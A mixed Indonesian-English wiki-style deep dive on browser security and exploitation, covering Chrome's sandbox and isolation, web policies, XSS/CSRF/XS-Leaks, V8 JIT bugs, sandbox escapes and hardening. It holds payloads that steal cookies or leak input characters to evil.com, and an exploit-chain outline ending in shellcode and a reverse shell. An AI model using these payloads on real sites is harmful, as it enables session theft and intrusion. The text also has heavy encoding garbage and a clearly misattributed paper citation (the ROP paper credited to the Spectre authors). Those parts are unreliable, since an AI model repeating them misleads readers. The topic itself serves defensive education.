π Browser Security & Exploitation β Deep Dive
βThe browser is the new OS β and itβs under constant siege.β
Comprehensive guide to browser security architecture, web isolation models, client-side attacks, V8 engine exploitation, sandbox escape techniques, and the modern 0-day pipeline.
π Daftar Isi
- 1. Arsitektur Multi-Process Chrome
- 2. Site Isolation & Security Boundaries
- 3. Sandbox Architecture
- 4. V8 JavaScript Engine
- 5. Same-Origin Policy (SOP)
- 6. Cross-Origin Resource Sharing (CORS)
- 7. Content Security Policy (CSP)
- 8. Cross-Origin Isolation (COOP, COEP, CORP)
- 9. Cross-Site Scripting (XSS) β Advanced
- 10. DOM Clobbering & mXSS
- 11. Cross-Site Request Forgery (CSRF)
- 12. XS-Leaks & Cross-Site Search
- 13. Side-Channel Attacks: Spectre, Meltdown, Cache
- 14. V8 Exploitation β JIT Bugs & Type Confusion
- 15. V8 Exploitation β OOB & RCE
- 16. Sandbox Escape Techniques
- 17. Chrome Extension Security
- 18. Zero-Day Discovery Pipeline
- 19. Bug Bounty to Exploit β The Full Chain
- 20. Case Studies β Pwn2Own & Chrome 0-Days
- 21. WebAuthn & Credential Security
- 22. Browser Fingerprinting & Anti-Detection
- 23. Fuzzing Browser Targets
- 24. Mitigation & Hardening Guide
- 25. References & Further Reading
1. Arsitektur Multi-Process Chrome
Chrome menggunakan multi-process architecture sejak rilis pertama. Setiap tab, ekstensi, plugin, dan GPU process berjalan di proses OS masing-masing.
| Komponen | Proses | Privilege Level |
|---|---|---|
| Browser | Browser Process | High (system) |
| Tab | Renderer Process | Low (sandbox) |
| GPU | GPU Process | Medium |
| Ekstensi | Extension Process | Varied |
| Network | Network Service Process | Medium |
| Utility | Utility Process | Low |
Key concepts:
- Process-per-site-instance: setiap tab bisa punya beberapa renderer process jika mengunjungi multiple sites.
- Site Isolation: memastikan dokumen dari origin berbeda tidak pernah berada dalam process yang sama.
- Navigation: browser process acts sebagai proxy β renderer tidak punya akses langsung ke network.
βββββββββββββββββββββββββββββββββββββββββββ
β Browser Process β
β ββββββββββββ ββββββββββββ β
β β UI β β Storage β β
β ββββββββββββ ββββββββββββ β
β ββββββββββββ ββββββββββββ β
β β Network β β Device β β
β ββββββββββββ ββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββ€
β Renderer 1 Renderer 2 Renderer 3 β
β (low-risk) (high-risk) (isolated) β
βββββββββββββββββββββββββββββββββββββββββββ
2. Site Isolation & Security Boundaries
Site Isolation (aktif sejak Chrome 67, mandatory sejak Chrome 77) memisahkan dokumen dari different sites ke dalam proses yang berbeda.
Bagaimana Ini Bekerja
- Browser process menentukan βsiteβ berdasarkan scheme + registrable domain (eTLD+1).
- Setiap navigasi cross-site memicu renderer process baru.
- Data dari satu site tidak pernah dibagikan dalam memory address space yang sama dengan site lain.
Implikasi Keamanan
| Ancaman | Tanpa Site Isolation | Dengan Site Isolation |
|---|---|---|
| Spectre (data read) | Rawan | Diblokir |
| Memory cross-read | Mungkin | Tidak mungkin |
| CSS/HTML leaks | Terbatas | Sangat terbatas |
Info
Site Isolation bukan sekadar security boundary β ia adalah architectural foundation untuk semua mitigasi side-channel di Chrome modern.
Out-of-Process Iframes (OOPIF)
Iframe cross-site juga mendapat proses terpisah. Ini penting untuk:
- Security: iframe tidak bisa membaca memory parent
- Stability: crash iframe tidak menumbangkan parent
- Resource isolation: separate memory budget
3. Sandbox Architecture
Sandbox Chrome menggunakan restricted token pada Windows (atau sejenis di Linux/macOS). Renderer process berjalan dengan low integrity level.
Lapisan Sandbox
βββββββββββββββββββββββββββββββββββββββββββ
β OS Kernel / Hardware β
βββββββββββββββββββββββββββββββββββββββββββ€
β Browser Process β βββ High Integrity
βββββββββββββββββββββββββββββββββββββββββββ€
β Network Service / GPU Process β βββ Medium Integrity
βββββββββββββββββββββββββββββββββββββββββββ€
β Renderer Process (Sandboxed) β βββ Low Integrity
βββββββββββββββββββββββββββββββββββββββββββ€
β JavaScript / V8 (untrusted) β βββ No direct OS access
βββββββββββββββββββββββββββββββββββββββββββ
Apa yang Diblokir di Sandbox
- Tidak bisa
fork()/CreateProcess() - Tidak bisa membaca file system kecuali direktori temporary
- Tidak bisa network access langsung (via browser process proxy)
- Tidak bisa akses display (window creation dibatasi)
- Hanya bisa komunikasi via IPC channel dengan browser process
Mojo IPC
Komunikasi sandboxed β browser process via Mojo β Chromeβs IPC system:
Renderer ββββ[Mojo IPC]ββββΊ Browser Process
β β
β Mojo Interface: β
β - blink.mojom.* β
β - network.mojom.* β
β - storage.mojom.* β
4. V8 JavaScript Engine
V8 adalah high-performance JS engine Google, ditulis dalam C++, dengan pipeline:
Source Code (JS)
β
βΌ
Parser β AST β Ignition (Interpreter) β Bytecode
β β
βΌ βΌ
TurboFan (JIT Compiler) ββββββββββββββ Hot code detected
β
βΌ
Optimized Machine Code
Komponen Kritis untuk Exploitation
| Komponen | Fungsi | Attack Surface |
|---|---|---|
| Parser | Parse JS ke AST | Bugs di parsing regex, destructuring |
| Ignition | Bytecode generator & interpreter | Type confusion di interpreter loop |
| TurboFan | JIT compiler untuk hot code | Most targeted β optimization bugs |
| Orinoco | Garbage collector | Use-after-free via GC race |
| Memory | Heap, stack, feedback vectors | OOB, type confusion, UAF |
Pointer Compression
V8 menggunakan pointer compression untuk mengurangi memory usage. Pointer disimpan sebagai 32-bit offset dari heap cage base. Ini membatasi heap size tapi menambah kompleksitas exploitation.
5. Same-Origin Policy (SOP)
SOP adalah mekanisme fundamental yang membatasi akses antar dokumen dari origin berbeda.
Definisi Origin
Scheme + Host + Port
https + example.com + 443
Dua halaman dianggap same-origin jika ketiga komponen identik.
Apa yang Diblokir SOP
| Resource | Cross-Origin Access |
|---|---|
| DOM access (iframe) | β Diblokir |
| Cookie read | β Diblokir |
| LocalStorage | β Diblokir |
| IndexedDB | β Diblokir |
| Script execution | β Diizinkan |
| CSS | β Diizinkan |
| Images | β Diizinkan |
<img> src | β Diizinkan |
SOP Bypasses
- Open redirector β leak via referrer headers
- DNS rebinding β ubah host DNS setelah SOP dicek
- Universal XSS via browser extension
- Protocol-based bypass (misal
file:vshttp:)
6. Cross-Origin Resource Sharing (CORS)
CORS adalah mekanisme yang melonggarkan SOP secara controlled.
Preflight Request
Untuk βnon-simpleβ requests (PUT, DELETE, custom headers, non-standard Content-Type), browser mengirim OPTIONS preflight:
OPTIONS /api/data HTTP/1.1
Origin: https://attacker.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: X-Custom-Header
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Methods: POST
Access-Control-Max-Age: 3600Vulnerability Patterns
| Bug | Dampak |
|---|---|
Access-Control-Allow-Origin: * + credentials | Semua origin bisa baca response |
Wildcard *.evil.com mirroring | Regex/RFI di balik proxy |
Misconfigured Vary: Origin | Cache poisoning |
null origin reflection | File:// & data:// URI bisa bypass |
| Origin truncation bugs | https://evil.com.example.com dianggap aman |
7. Content Security Policy (CSP)
CSP adalah defense-in-depth untuk mitigasi XSS dan data injection.
Direktif Utama
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-abc123';
style-src 'self' 'sha256-...';
img-src 'self' https://cdn.example.com;
object-src 'none';
base-uri 'none';
frame-ancestors 'none';Bypass Teknik
| Teknik | Prasyarat |
|---|---|
| JSONP endpoint di whitelist | script-src includes trusted CDN |
File upload + 'self' | Upload JS ke same-origin |
| Angular 1.x sandbox escape | Legacy framework CSP bypass |
| Base-uri injection | base-uri tidak diset |
| CSS injection exfiltration | style-src terlalu longgar |
| Dangling markup | img-src mengizinkan image |
Warning
CSP bukan silver bullet. Selalu kombinasikan dengan proper output encoding, input validation, dan
HttpOnlycookies.
CSP Level 3
Fitur baru:
'strict-dynamic'β script nonce/ hash yang di-load via script trusted juga dianggap trusted'unsafe-hashes'β inline event handler via hash- Reporting API (deprecating
report-uri)
8. Cross-Origin Isolation (COOP, COEP, CORP)
Cross-origin isolation memungkinkan penggunaan SharedArrayBuffer dan performance.measureUserAgentSpecificMemory() dengan aman.
COOP β Cross-Origin Opener Policy
Cross-Origin-Opener-Policy: same-originMemisahkan window dari cross-origin opener. Ini mencegah:
window.openerdari origin berbeda- XS-Leaks via popup
- Navigation-based leaks
| Value | Efek |
|---|---|
unsafe-none | Default β no isolation |
same-origin-allow-popups | Mempertahankan opener untuk popup same-origin |
same-origin | Isolasi penuh β references cross-origin hilang |
COEP β Cross-Origin Embedder Policy
Cross-Origin-Embedder-Policy: require-corpMewajibkan semua resource di halaman memiliki Cross-Origin-Resource-Policy yang sesuai.
CORP β Cross-Origin Resource Policy
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Resource-Policy: same-site9. Cross-Site Scripting (XSS) β Advanced
Reflected XSS
Payload langsung di response tanpa encoding:
/search?q=<script>alert(1)</script>
Stored XSS
Payload tersimpan di database, dieksekusi saat data ditampilkan:
-- Contoh: komentar forum dengan payload
INSERT INTO comments VALUES ('<img src=x onerror="fetch(\"https://evil.com/steal?c=\"+document.cookie)">');DOM-based XSS
Payload dieksekusi via client-side JavaScript tanpa server involvement:
// Vulnerable code
const name = new URLSearchParams(location.search).get("name")
document.getElementById("greeting").innerHTML = name // XSS!Mutation XSS (mXSS)
Memanfaatkan parser mutation β perbedaan antara DOM tree yg dihasilkan browser dengan yg diharapkan sanitizer:
<noscript><p title="</noscript><img src=x onerror=alert(1)>"></p></noscript>Server-Side Template Injection (SSTI)
Ketika attacker dapat menginjeksi template directive ke server:
// Node.js + pug β vulnerable
app.get("/", (req, res) => {
res.render("template", { name: req.query.name })
})
// Payload: #{7*7} β 4910. DOM Clobbering & mXSS
DOM Clobbering
Memanfaatkan HTML element id / name untuk overwrite JavaScript variable:
<!-- Global scope pollution -->
<a id="config"></a>
<base id="URL" />
<form name="body"></form>
<script>
// If developer checks if (config) β truthy karena element
if (config) {
loadConfig(config.href) // dapat mengontrol URL
}
</script>Scriptless XSS
Menggunakan CSS injection + DOM clobbering tanpa <script>:
/* Inject CSS */
input[value^="admin"] {
background: url(https://evil.com/leak?char=a);
}mXSS (Mutation XSS) β Deep Dive
mXSS bekerja karena perbedaan antara parser HTML (DOM API vs innerHTML serialization):
| Stage | Deskripsi |
|---|---|
| 1. Input | <details><p title="</details><img src=x onerror=alert(1)> |
| 2. Sanitizer (innerHTML) | Membaca HTML string β </details> dianggap string biasa |
| 3. Browser re-parser | </details> diinterpretasi sebagai tag β mutation terjadi |
| 4. DOM | <img> terbentuk sebagai element baru dengan event handler |
Mitigasi: gunakan DOMPurify dengan konfigurasi RETURN_DOM_FRAGMENT.
11. Cross-Site Request Forgery (CSRF)
CSRF memaksa browser korban mengirim request ke aplikasi target tanpa sepengetahuan korban.
Mekanisme
- Korban login ke
bank.comβ session cookie diset - Korban browsing ke
evil.com evil.commemuat image/form yang POST kebank.com/transfer?amount=1000- Cookie otomatis dikirim karena same-origin untuk cookie
CSRF Token Pattern
// Server memberikan CSRF token dalam session
// Setiap form mengandung token ini
<input type="hidden" name="csrf_token" value="x7k2m9..." />Bypass Teknik
| Teknik | Cara Kerja |
|---|---|
| Token prediction | Token lemah (timestamp-based) |
| Cookie injection | Set cookie di subdomain |
| Referer-based bypass | Hapus/masking referer header |
| Double submit bypass | If cookie = parameter, inject cookie |
| JSON CSRF | Content-Type: application/json lewat XHR |
12. XS-Leaks & Cross-Site Search
XS-Leaks (Cross-Site Leaks) adalah kelas attack yang mengeksploitasi timing, size, dan error status dari cross-origin requests untuk menginfer informasi.
Vectors
| Teknik | Yang Dileak |
|---|---|
| Timing leak | Response time β data existence |
| Frame count | window.length β jumlah iframe |
| Cache probing | Resource cache β visited status |
| Error events | onload / onerror β resource exists |
| Idle detection | User activity status |
| CSS injection leak | Attribute selectors β CSRF token chars |
Cross-Site Search (XSSearch)
Menentukan apakah user memiliki akun di suatu service:
// Bruteforce search API β timing-based
for (const email of emails) {
const start = performance.now()
await fetch(`https://target.com/api/search?q=${email}`)
const elapsed = performance.now() - start
if (elapsed > THRESHOLD) console.log("Found:", email)
}Mitigasi
SameSite=LaxatauSameSite=Strictpada cookies- Cross-Origin isolation (COOP + COEP)
Sec-Fetch-*headersfetchmetadata (Sec-Fetch-Site,Sec-Fetch-Mode)
13. Side-Channel Attacks: Spectre, Meltdown, Cache
Side-channel attack mengeksploitasi microarchitectural state CPU (cache, branch predictor) untuk mengakses data yang seharusnya tidak bisa diakses.
Spectre (Variant 1 & 2)
// Spectre v1 β Bounds Check Bypass
if (x < array1_size) {
// CPU speculative execution: jalankan meski x > array1_size
int y = array2[array1[x] * 4096];
// y mempengaruhi cache β diukur via timing
}
| Variant | Nama | Target |
|---|---|---|
| v1 | Bounds Check Bypass | Array bounds |
| v2 | Branch Target Injection | Indirect branch predictor |
| v3 | Meltdown (Rogue Data Cache Load) | Kernel memory |
| v4 | Speculative Store Bypass | Store queue |
Cache Timing Attacks
// In browser: timing measurement via performance.now()
const start = performance.now()
// ... access sensitive data ...
const delta = performance.now() - start
// delta ~~ cache hit? data berada di address tersebut| Mitigation | Implemented In |
|---|---|
| Site Isolation | Chrome 67+ |
| Reduced timer precision | All browsers (Chrome 69+) |
| Cross-Origin Read Blocking | Chrome |
| SharedArrayBuffer gating | Requires COOP+COEP |
| Β΅op cache partitioning | Chrome (Intel only) |
Info
SharedArrayBuffer telah di-re-enable sejak Chrome 92, tetapi hanya untuk situs yang mengirim COOP+COEP headers.
14. V8 Exploitation β JIT Bugs & Type Confusion
JIT compiler adalah attack surface terbesar di V8 karena ia menghasilkan dan mengeksekusi kode native dari JavaScript.
Turbofan Optimization Pipeline
JavaScript
β
Bytecode (Ignition)
β
Tier 0 β Unoptimized (Ignition)
β (hot code detected)
Tier 1 β Turbofan (Optimized)
β (deoptimization if assumptions wrong)
Tier 0 β Re-optimized or fallback
Type Confusion via JIT
Developer membuat asumsi type berdasarkan feedback vectors. Jika asumsi salah, terjadi type confusion:
// Contoh simplifikasi JIT type confusion
function confuse(arr, i, val) {
// Turbofan mengasumsikan arr selalu array of Smis
arr[i] = val // Jika val adalah object β type confusion
}
let arr = [1.1, 2.2, 3.3]
confuse(arr, 0, 1.4) // Warmup β Smi + Double
confuse(arr, 0, 1.4) // Warmup lagi
confuse(arr, 0, 1.4) // Turbofan compiles
confuse(arr, 0, { x: 0x41414141 }) // BOOM β type confusion!Escape Analysis Bug
Ketika Turbofan gagal melakukan escape analysis dengan benar, object yang seharusnya di stack bisa diakses via pointer yang sudah tidak valid, menyebabkan Use-After-Free (UAF).
Key Exploit Primitives
| Primitive | Deskripsi |
|---|---|
addrof | Mendapatkan address heap dari JS object |
fakeobj | Membuat pointer JS dari arbitrary address |
| Arbitrary read | Membaca memory di address tertentu |
| Arbitrary write | Menulis memory di address tertentu |
| Code execution | Mengontrol RIP via corrupted function pointer |
15. V8 Exploitation β OOB & RCE
Out-of-Bounds (OOB) Access
OOB terjadi ketika index array melampaui allocated bounds:
// CVE-2021-30517 β OOB in Turbofan
function oob_read(arr, idx) {
// Turbofan mengeliminasi bounds check karena
// menganggap idx selalu < arr.length (berdasarkan warmup)
return arr[idx]
}Exploitation strategy:
- OOB read β leak Map pointer dari adjacent objects
- Fake obj construction β overwrite
elementspointer - Arbitrary read/write on V8 heap
- Overwrite WASM RWX page β shellcode
WASM RZX/RWX
V8 mengalokasikan RWX memory pages untuk WebAssembly compilation. Ini adalah target utama exploitation:
// WASM module β V8 alokasi RWX page
const wasmCode = new Uint8Array([0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00])
const wasmModule = new WebAssembly.Module(wasmCode)Exploit chain:
- Dapatkan arbitrary read/write via OOB + type confusion
- Find WASM RWX page address
- Tulis shellcode ke RWX page
- Panggil WASM function β shellcode executes
Modern Mitigations
| Mitigation | Description |
|---|---|
| Pointer compression | Heap pointer adalah 32-bit offset |
| V8 Sandbox | Isolated heap, pointer table indirection |
| Sandboxed pointers | All pointers via handle table |
| CET (Control-flow Enforcement) | Shadow stack, indirect branch tracking |
| CFG (Control Flow Guard) | Windows-only |
16. Sandbox Escape Techniques
Sandbox escape adalah langkah setelah mendapatkan code execution di renderer process β tujuan: pindah ke browser process atau system.
Attack Surface
| Vector | Target |
|---|---|
| IPC Mojo interfaces | Browser process services |
| File system access | Symlink race, temp file abuse |
| Network service | Connect to internal services |
| GPU compositor | Shared memory corruption |
| Service Workers | Persistence via SW |
| Browser extensions | High-privilege extension API |
Mojo IPC Bug
Mojo interfaces didefinisikan di .mojom files. Jika ada type confusion di de-serialization:
Renderer β Mojo message to BrowserProcess
β
βΌ
Mojo parser β type confusion β OOB write
β
βΌ
Code execution di browser process
Notable Escapes
| Tahun | CVE | Teknik |
|---|---|---|
| 2019 | CVE-2019-13720 | Use-after-free in Audio component |
| 2020 | CVE-2020-16040 | Type confusion in Turbofan + Mojo IPC |
| 2021 | CVE-2021-30551 | OOB in Turbofan β Sandbox bypass via Mojo |
| 2022 | CVE-2022-2294 | Heap overflow in WebRTC |
| 2023 | CVE-2023-3079 | UAF in V8 β Sandbox escape via SharedArrayBuffer |
Common Escape Patterns
- Renderer compromise: Code execution via V8 exploit
- Mojo interface find: Enumeration of available Mojo IPC endpoints
- IPC privilege escalation: Abuse privileged Mojo service
- File write: Write to
Downloads/or temp dir β binary planting - Second-stage: Download and execute native payload
17. Chrome Extension Security
Extension Architecture
Extension
βββ Manifest (manifest.json)
βββ Background script (persistent/event-driven)
βββ Content scripts (injected into pages)
βββ Popup / Options pages
βββ Native messaging host (optional, high privilege)
Permission Model
| Permission | Access granted |
|---|---|
activeTab | Current tab only |
<all_urls> | All web pages |
storage | Extension storage API |
nativeMessaging | System native binary (RCE risk) |
webRequest | Intercept & modify network traffic |
debugger | Chrome DevTools Protocol β powerful |
Common Extension Vulnerabilities
| Vulnerability | Dampak |
|---|---|
External script-src injection | XSS via CDN |
| PostMessage listener | Data exfiltration |
Insecure nativeMessaging | Host binary β arbitrary command exec |
webRequest manipulation | Traffic interception |
| Content script eval | DOM access β same as XSS |
| Permission creep | Request excessive permissions |
Malware Patterns
- Manifest v2 β v3 migration abuse:
webRequestBlockingremoval pushed malware to declarativeNetRequest - Drive-by extension install: via enterprise policy or deceptive consent
- Cookie thief extension:
cookies.getAll()β massive data theft
18. Zero-Day Discovery Pipeline
Fullchain vs Single Component
Single bug (e.g., V8 RCE)
β
βΌ
Renderer compromise
β
βΌ
+ Sandbox escape bug
β
βΌ
Full chain exploit
Discovery Approaches
| Method | Description |
|---|---|
| Manual code review | Audit V8 Turbofan, Mojo, WebAudio, WebGPU |
| Differential fuzzing | Compare two builds to find security fixes |
| Patch diffing | Analisis commit messages + patches |
| Bug bounty triage | Reports dari external researchers |
| Exploit prediction | ML-based prediction of vulnerable code paths |
Patch Gap
Rata-rata patch gap (public commit β public exploit):
| Component | Average Gap |
|---|---|
| V8 Turbofan | 5-14 days |
| WebAudio | 7-21 days |
| Mojo IPC | 14-30 days |
| Site Isolation | 30-90 days |
19. Bug Bounty to Exploit β The Full Chain
Proses dari menemukan bug hingga exploit siap:
Stage 1: Recon & Target Selection
# Target Mojo interfaces
find chromium/src -name "*.mojom" | xargs grep -r "interface"
# Target Turbofan
Search for "Simp" (Simplified Lowering), "LoadElimination", "BoundsCheckElimination"
# Patch history
git log --oneline --all --grep="security" -- v8/src/compiler/Stage 2: Trigger Identification
- Code path yang bisa dieliminasi bounds check-nya
- Function yang menerima input dari JS tanpa validasi cukup
- Map transition yang tidak diperhitungkan di optimization phase
Stage 3: PoC Development
// Minimal PoC structure
function trigger(arr) {
// 1. Patch Turbofan assumptions
// 2. Trigger type confusion or OOB
// 3. Verify crash / corrupted state
}
// Warmup
for (let i = 0; i < 100000; i++) {
trigger([1.1, 2.2])
}
// Trigger
trigger([1.1, 2.2])
print("PoC executed")Stage 4: Exploit Chain Construction
- Leak β
addrof+fakeobj - Arbitrary R/W β corrupted backing store
- WASM RWX β shellcode injection
- Sandbox escape β Mojo IPC abuse
- Payload β reverse shell / beacon
Stage 5: Weaponization
- ROP chain construction
- CFI / CET bypass
- Anti-debugging / sandbox detection
- Payload persistence
20. Case Studies β Pwn2Own & Chrome 0-Days
Pwn2Own Vancouver 2023 (Manfred Paul)
Full chain: Safari renderer β macOS kernel
- Renderer bug: TYPE CONFUSION in JavaScriptCore B3 JIT compiler
- Sandbox escape: XPC service vulnerability
- Kernel exploit: Race condition in XNU kernel
Chrome 0-Day β CVE-2021-21224 (in the wild)
Type confusion in V8 Turbofan
- Component:
JSTypedArrayconstructor withlengthgetter - Trigger:
Array.from()dengan custom getter on length - Impact: Remote code execution in renderer process
- Detection: Chromeβs own fuzzing infrastructure
Chrome 0-Day β CVE-2022-2294 (in the wild)
Heap overflow in WebRTC
- Component:
WebRTCvideo capture - Trigger: Malformed SDP offer
- Impact: Sandbox escape (memory corruption in browser process)
- Patch: Additional size validation in RTP packet parsing
Cascade (2023 β Google Project Zero)
Full chain exploit chain:
| Bug | Component | Impact |
|---|---|---|
| 1 | V8 Turbofan | RCE in renderer |
| 2 | Mojo service | Sandbox escape |
| 3 | Kernel | Privilege escalation |
Dikembangkan sebagai βin-the-wildβ simulation untuk mengukur detection capabilities.
21. WebAuthn & Credential Security
WebAuthn (FIDO2) Flow
Browser ββββββββββββββββΊ Server
β β
β challenge β
βββββββββββββββββββββββββββ
β β
β Create credential β
β (navigator.credentials) β
β β
β Attestation Object β
ββββββββββββββββββββββββββΊβ
β β
β Verify signature β
β β
Attack Surface
| Attack | Description |
|---|---|
| Phishing-resistant bypass | Man-in-the-middle proxy authentication |
| CTAP HID injection | USB HID keyboard β fake security key |
| Platform credential cloning | TPM extraction |
| WebAuthn protocol downgrade | Force U2F instead of FIDO2 |
Credential Leak Vectors
autocomplete="webauthn"β autofill abuse- Conditional UI timing attacks
- Credential ID enumeration
22. Browser Fingerprinting & Anti-Detection
Canvas Fingerprinting
const canvas = document.createElement("canvas")
const ctx = canvas.getContext("2d")
// Render text + shapes (GPU-specific differences)
ctx.fillText("Fingerprint", 10, 50)
const fingerprint = canvas.toDataURL()WebGL Fingerprinting
GPU driver quirks, rendering differences, extensions support β highly unique.
Audio Fingerprinting
AudioContext β oscillator characteristics per hardware.
Known Anti-Detection Tools
| Tool | Approach |
|---|---|
| Playwright/Stealth | Patch detection scripts |
| Puppeteer Extra | Plugin-based evasion |
| Headless Chrome | No GPU, limited feature set |
| Tor Browser | Uniform fingerprint per user agent |
| Brave | Fingerprinting randomization |
23. Fuzzing Browser Targets
Coverage-Guided Fuzzing
Instrumented binary
β
βΌ
Seed corpus β Mutation engine β New input
β β
βΌ βΌ
Executor (testcase) Code coverage feedback
β β
βΌ βΌ
Crash analysis βββββββββββ Interesting seeds
Tools & Frameworks
| Tool | Target |
|---|---|
| libFuzzer | V8, libxml, libpng (OSS-Fuzz) |
| AFL++ | Broader targets |
| Domato | DOM API fuzzer |
| Grammar-based | JavaScript engine parser |
| Differential | Compare multiple browser outputs |
Fuzzing V8
# Build V8 with coverage instrumentation
tools/dev/v8gen.py x64.release -- v8_fuzztest=true
# Run fuzztest
./out/x64.release/v8_fuzztest --fuzz=...
# OSS-Fuzz integration
# Continuous fuzzing via ClusterFuzzDomato β DOM Fuzzing
# Configurasi generator
generator.setConfig('MAX_DEPTH', 10)
generator.addRule('createElement', 'createElement("%s")')
generator.addTemplate('document.body.appendChild(%s)')24. Mitigation & Hardening Guide
Web Developer Actions
| Action | Benefit |
|---|---|
Implement strict CSP (strict-dynamic) | Mitigate XSS, bahkan jika ada injection |
HttpOnly + Secure + SameSite cookies | Mencegah cookie theft & CSRF |
| Cross-Origin isolation (COOP+COEP) | Enable SharedArrayBuffer, prevent XS-Leaks |
X-Content-Type-Options: nosniff | Prevent MIME sniffing |
Referrer-Policy: strict-origin | Limit referrer leakage |
| Input sanitization (DOMPurify) | Prevent stored/reflected XSS |
| Subresource Integrity (SRI) | Ensure CDN scripts are not tampered |
Enterprise Hardening
| Policy | Description |
|---|---|
Block extensions with <all_urls> | Reduce permission creep |
Force SameSite=Lax via enterprise policy | Mitigate CSRF cross-browser |
| Enable Site Isolation | Chrome built-in, ensure no disabling |
| Disable WebAssembly | Reduce V8 RWX attack surface |
| Application Guard (Edge) | Container-based isolation |
| Security Product Integration | Endpoint detection & response |
25. References & Further Reading
Papers
| Title | Authors | Year |
|---|---|---|
| The Geometry of Innocent Flesh on the Bone | Kocher et al. (Spectre) | 2018 |
| Meltdown | Lipp et al. | 2018 |
| Cross-Site Search Attacks | Schwenk et al. | 2017 |
| V8 Ignition: An Interpreter for V8 | 2016 |
Repositories
- Google Project Zero β Browser Security Research
- V8 Source Code
- Chromium Security Advisories
- Portswigger Research β XSS
- Browser Fuzzing by Google
Tools
| Tool | Purpose |
|---|---|
| DOMPurify | XSS sanitizer |
| XS-Leaks Wiki | XS-Leaks reference |
| Domato | DOM fuzzer |
| Frida | Dynamic instrumentation |
| GDB with V8 helpers | V8 debugging |
| Retired.pw | CTF browser exploit archive |
Wikilinks
Lihat juga: web-hacking-exploitation, comprehensive-threat-directory, zero-taxonomy-security, digital-privacy-anonymity
Last updated: 2026-07-02 | Browser Security & Exploitation Deep Dive